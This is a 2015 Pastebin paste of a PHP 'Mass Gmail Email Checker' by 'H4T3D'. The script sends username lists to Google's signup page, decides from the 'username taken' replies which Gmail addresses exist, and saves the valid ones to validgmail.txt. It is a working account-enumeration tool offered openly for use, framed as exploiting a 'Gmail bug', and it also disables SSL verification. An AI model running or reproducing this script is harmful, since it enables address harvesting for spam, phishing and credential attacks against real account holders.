Advertisement
H4T3D

Check Emails From Gmail Database (Gmail Bug)- H4T3D

Sep 11th, 2015
1,403
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.35 KB | None | 0 0
  1. <?php
  2. #########################################
  3. #Mass Gmail Email Checker
  4. #Checking Emails From Google (Gmail)Database lol :p
  5. #Gmail Discovered  Bug By H4T3D
  6. #[email protected] (check my email is it valid ;))
  7. ##########################################
  8. ob_start();
  9. @set_time_limit(0);
  10.  error_reporting(0);
  11. echo "
  12. <head>
  13. <link href='https://fonts.googleapis.com/css?family=Orbitron' rel='stylesheet' type='text/css'>
  14. <form method='POST'>
  15. </head>
  16. <style>
  17. textarea {
  18.     resize:none;
  19.     color: #1975FF ;
  20.     border:4px solid red ;
  21.     font-family: 'Orbitron', sans-serif;
  22.     font-size:15px;
  23. }
  24. html,body{
  25.        font-family: 'Orbitron', sans-serif;
  26.        background:#000000;
  27. }
  28.  
  29. input {
  30.        color: 3300FF;
  31.        border:4px solid #33CCFF;
  32.        font-family: 'Orbitron', sans-serif;
  33. }
  34. h1{
  35.     color: #FFFFFF;
  36.        font-family: 'Orbitron', sans-serif;
  37.     }
  38. h3,fieldset {
  39.        color: #FFFFFF;
  40.        width:50%;
  41.        border:4px solid red;
  42.        font-family: 'Orbitron', sans-serif;
  43.  
  44. }
  45. </style>";
  46.  
  47. echo "
  48. <center><h1> Gmail Valid Email Database 2015 - H4T3D</h1></center>
  49. <p dir='ltr' align='center'>
  50. <br>
  51. <br>
  52. <input type='submit' name='scan' value='Start'><br>
  53. <center><h3> >> <a href=\"validgmail.txt\">Valid Gmail Emails</a></h3></center>
  54. </p>";
  55. if(isset($_POST['scan'])){
  56. function brute($users){
  57.     $ch = curl_init();      
  58.     curl_setopt($ch, CURLOPT_URL, "https://accounts.google.com/SignUp?dsh=3961300277438513116&service=mail");
  59.     curl_setopt($ch, CURLOPT_HEADER, 0);
  60.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  61.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  62.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  63.     curl_setopt($ch, CURLOPT_POSTFIELDS, "GmailAddress=$users");
  64.     curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
  65.     $login = curl_exec($ch);
  66.     //print_r($login);
  67.     $check = (eregi('Someone already has that username',$login)) ? true:false;
  68.     $check2 = (eregi('That looks like your email address',$login)) ? true:false;
  69.     $check3 = (eregi('You entered an email address that is already associated with an account',$login)) ? true:false;
  70.    
  71. if($check=="true"){
  72.         echo "<p align='center' dir='ltr'><font face='Arial Black' size='2' color='green'>$users@gmail.com is Valid !</font></font></p>";
  73. $myfile = fopen("validgmail.txt", "a") or die("Unable to open file!");
  74.         fwrite($myfile, $users."@gmail.com\n");
  75.         fclose($myfile);
  76.    flush();@ob_flush();
  77. }
  78.  
  79.  
  80. elseif($check2=="true"){
  81.         echo "<p align='center' dir='ltr'><font face='Arial Black' size='2' color='red'>$users@gmail.com does not exits</font></p>";
  82.     }
  83.  
  84. elseif($check3=="true"){
  85.         echo "<p align='center' dir='ltr'><font face='Arial Black' size='2' color='green'>$users@gmail.com is Valid !</font></font></p>";
  86. $myfile = fopen("validgmail.txt", "a") or die("Unable to open file!");
  87.         fwrite($myfile, $users."@gmail.com\n");
  88.         fclose($myfile);
  89.    flush();@ob_flush(); }
  90.  
  91.  
  92. else{
  93.         echo "<p align='center' dir='ltr'><font face='Arial Black' size='2' color='red'>$users@gmail.com does not Exits</font></p>";
  94. flush();@ob_flush();   
  95. }
  96.  
  97.  
  98. }            
  99.  
  100.  
  101.  
  102.    
  103.     $username = explode("\n", $_POST['username']);
  104.    
  105.    
  106. foreach($username as $users) {
  107.     $users = @trim($users);
  108.    
  109.         $users = trim($users, "@gmail.com");
  110.         echo brute($users);
  111.                  }
  112.  
  113. }
  114.  
  115. echo"<center><h3> Coded By H4T3D</h3></center>";
  116. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement